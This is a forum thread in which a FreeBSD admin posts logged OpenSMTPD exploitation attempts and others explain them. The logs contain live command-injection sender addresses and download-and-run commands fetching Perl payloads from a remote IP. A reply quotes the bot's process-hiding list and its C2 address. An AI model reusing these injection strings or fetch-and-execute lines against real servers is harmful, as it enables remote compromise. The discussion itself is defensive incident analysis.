# SMTPD hack attempt?



## toorski (Feb 27, 2020)

In my *11.3 FreeBSD* jail with *OpenSMTPD* I found the following email message and output in daily log as follow:


```
Checking for rejected mail:

-- End of daily output --

From //80.82.223.34/.jet3;perl .jet3';@mydomain.com Wed Feb 19 04:17:37 2020
Return-Path: <//80.82.223.34/.jet3;perl .jet3';@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (163.53.207.186 [163.53.207.186])
    by mydomain.com (OpenSMTPD) with SMTP id beaa7283
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 04:17:36 -0800 (PST)
Date: Wed, 19 Feb 2020 04:17:37 -0800 (PST)
Message-Id: <54cb8ee6e8598fb3@mydomain.com>

xxx

From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 04:25:10 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (sps-technoscreen.com [80.82.223.34])
    by mydomain.com (OpenSMTPD) with SMTP id 011db50b
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Date: Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Message-Id: <54cb8ef061c6b0b1@mydomain.com>

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget http://80.82.223.34/.smt6;curl -O http://80.82.223.34/.smt6;fetch -o /tmp/.smt6 http://80.82.223.34/.smt6;perl .smt6;rm -rf .smt*


From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 08:03:50 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (FO111-51.bistrita.astral.ro [85.186.111.51])
    by mydomain.com (OpenSMTPD) with SMTP id 80f0bb45
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Date: Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Message-Id: <54cb8f12664a434c@mydomain.com>

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget 80.82.223.34/.smt7;perl .smt7;rm -rf .smt7


From ;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com Thu Feb 20 01:54:38 2020
Return-Path: <;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (14.27.37.35 [14.27.37.35])
    by mydomain.com (OpenSMTPD) with SMTP id 836df4fe
    for <root@mydomain.com>;
    Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Date: Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Message-Id: <54cb8f4c0cc57c3b@mydomain.com>

xxx
```

What was that supposed to accomplish?

*Note:*
_My actual domain name was edited by me with "mydomain.com"_


----------



## Lamia (Feb 27, 2020)

Well, ur

It's an attempt to see if your system will run a remote script/instructions hence the commands - wget and the likes.


----------



## toorski (Feb 27, 2020)

Lamia said:


> Well, ur
> 
> It's an attempt to see if your system will run a remote script/instructions hence the commands - wget and the likes.



Yep, it seems so 

This is in my 11.3 jail netstat:


```
# netstat -a
Some tcp sockets may have been deleted.
Some udp sockets may have been deleted.
Some ip sockets may have been created or deleted.
Some icmp sockets may have been created or deleted.
Some igmp sockets may have been created or deleted.
Some pim sockets may have been created or deleted.
Some ip6 sockets may have been created or deleted.
Some icmp6 sockets may have been created or deleted.
Active UNIX domain sockets
Address          Type   Recv-Q Send-Q            Inode             Conn             Refs          Nextref Addr
               0 #0          0      0             4374                0                0                0
               0 #0          0      0             4373                0                0                0
               0 #0          0      0             4372                0                0                0
Bus error
```

What do I do now?

Tho, my 12.1 host's netstat looks normal


----------



## Lamia (Feb 27, 2020)

The hacker might have left a footprint - IP address. Block it. 
If you have a greylist for email bruteforce for tcp/udp connection tracking, etc in place, you should be fine after blocking it. That's why milters like greylist, antivirus, amavis, etc are recommended.


----------



## SirDice (Feb 27, 2020)

Grabbed that perl script, just for giggles. Oddly enough that .smt6 file was already removed, the .jet3 file however was not. And it turns out to be a slightly modified version of a common IRC bot. Note that this script will not open a listening port, so you're not going to see it with `netstat -a`. It also tries to hide its presence by changing the process name:

```
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
                   "/usr/sbin/httpd -k start -DSSL",
           "/usr/sbin/httpd",
                   "/usr/sbin/sshd -i",
                   "/usr/sbin/sshd",
               "/usr/sbin/sshd -D",
           "/usr/sbin/apache2 -k start",
               "/sbin/syslogd",
               "/sbin/klogd -c 1 -x -x",
                   "/usr/sbin/acpid",
                   "/usr/sbin/cron");
```

This particular script connects to 212.24.105.253 on port 80:

```
my $servidor="212.24.105.253";
my $ircname =("linux");
my $realname = ("linux");
my $porta='80';
```

There's usually an IRC service running there but I didn't check it. Before you go all gung-ho on those IP addresses, they're just ignorant users that got their server hacked by a similar bot.


----------



## toorski (Feb 27, 2020)

This is the first time that I see anything about opensmtpd, in my daily security run output:

`Checking for packages with security vulnerabilities:
Database fetched: Wed Feb 26 03:34:28 PST 2020
py36-urllib3-1.22,1
opensmtpd-5.9.2p1_7,1
python27-2.7.17_1: Tag: expiration_date Value: 2020-12-31
python27-2.7.17_1: Tag: deprecated Value: EOLed upstream`

I guess, it's time for me to switch to exim. Then, I can just run exim in 12.1 jail with 12.1 host, instead of running opensmtpd in 11.3 jail with 12.1 host, as I'm doing now, because opensmtpd doesn't support openssl 1.1*


----------



## toorski (Feb 27, 2020)

SirDice said:


> Grabbed that perl script, just for giggles



I'll play with those scripts, so maybe I learn something. Then, I start hacking the modderhackers


----------

